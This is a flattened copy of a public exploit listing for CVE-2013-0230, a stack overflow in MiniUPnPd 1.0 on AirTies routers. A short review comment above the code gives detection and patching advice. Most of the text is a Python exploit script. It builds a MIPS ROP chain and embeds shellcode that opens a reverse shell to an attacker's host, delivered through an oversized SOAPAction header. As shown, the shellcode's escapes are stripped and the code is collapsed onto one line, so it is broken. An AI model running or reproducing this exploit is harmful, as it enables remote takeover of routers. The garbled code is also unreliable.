
MiniUPnPd 1.0 Stack Overflow

Posted on 28 April 2015

# NOTE(review): public exploit listing for CVE-2013-0230, the stack overflow in
# MiniUPnPd 1.0's handling of the HTTP SOAPAction header (see the linked
# exploit-db writeup). Kept verbatim for reference only: the extraction
# flattened the script onto two physical lines, so as shown it is not valid
# Python and is not meant to be run.
# Defensive takeaways grounded in the listing: the trigger is a SOAP POST to
# the device's UPnP control port (5555 on the tested AirTies RT-204v3) whose
# SOAPAction header value is several KB long (2052 filler bytes plus the
# chain), so an oversized SOAPAction header on UPnP traffic is the signature to
# alert on; the mitigation is updating MiniUPnPd / vendor firmware past 1.0
# and not exposing UPnP to untrusted networks.
#!/usr/bin/env python # Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series # Date: 26.04.2015 # Exploit Author: Onur ALANBEL (BGA) # Vendor Homepage: http://miniupnp.free.fr/ # Version: 1.0 # Architecture: MIPS # Tested on: AirTies RT-204v3 # CVE : 2013-0230 # Exploit gives a reverse shell to lhost:lport # Details: https://www.exploit-db.com/docs/36806.pdf import urllib2 from string import join from argparse import ArgumentParser from struct import pack from socket import inet_aton BYTES = 4 def hex2str(value, size=BYTES): data = "" for i in range(0, size): data += chr((value >> (8*i)) & 0xFF) data = data[::-1] return data arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd CVE-2013-0230 Reverse Shell exploit for AirTies RT Series, start netcat on lhost:lport") arg_parser.add_argument("--target", required=True, help="Target IP address") arg_parser.add_argument("--lhost", required=True, help="The IP address which nc is listening") arg_parser.add_argument("--lport", required=True, type=int, help="The port which nc is listening") args = arg_parser.parse_args() libc_base = 0x2aabd000 ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget sleep = hex2str(libc_base + 0x35620) # sleep function ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. 
gadget s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget s2 = s6 lport = pack('>H', args.lport) lhost = inet_aton(args.lhost) shellcode = join([ "x24x11xffxff" "x24x04x27x0f" "x24x02x10x46" "x01x01x01x0c" "x1ex20xffxfc" "x24x11x10x2d" "x24x02x0fxa2" "x01x01x01x0c" "x1cx40xffxf8" "x24x0fxffxfa" "x01xe0x78x27" "x21xe4xffxfd" "x21xe5xffxfd" "x28x06xffxff" "x24x02x10x57" "x01x01x01x0c" "xafxa2xffxff" "x8fxa4xffxff" "x34x0fxffxfd" "x01xe0x78x27" "xafxafxffxe0" "x3cx0e" + lport + "x35xce" + lport + "xafxaexffxe4" "x3cx0e" + lhost[:2] + "x35xce" + lhost[2:4] + "xafxaexffxe6" "x27xa5xffxe2" "x24x0cxffxef" "x01x80x30x27" "x24x02x10x4a" "x01x01x01x0c" "x24x0fxffxfd" "x01xe0x78x27" "x8fxa4xffxff" "x01xe0x28x21" "x24x02x0fxdf" "x01x01x01x0c" "x24x10xffxff" "x21xefxffxff" "x15xf0xffxfa" "x28x06xffxff" "x3cx0fx2fx2f" "x35xefx62x69" "xafxafxffxec" "x3cx0ex6ex2f" "x35xcex73x68" "xafxaexffxf0" "xafxa0xffxf4" "x27xa4xffxec" "xafxa4xffxf8" "xafxa0xffxfc" "x27xa5xffxf8" "x24x02x0fxab" "x01x01x01x0c" ], '') payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2 + ra_2 + 'C'*32 + shellcode soap_headers = { 'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload, } soap_data = """ <?xml version='1.0' encoding="UTF-8"?> <SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" > <SOAP-ENV:Body> <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1" SOAP-ENC:root="1"> </ns1:action> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """ try: print "Exploiting..." req = urllib2.Request("http://" + args.target + ":5555", soap_data, soap_headers) res = urllib2.urlopen(req).read() except: print "Ok"

 
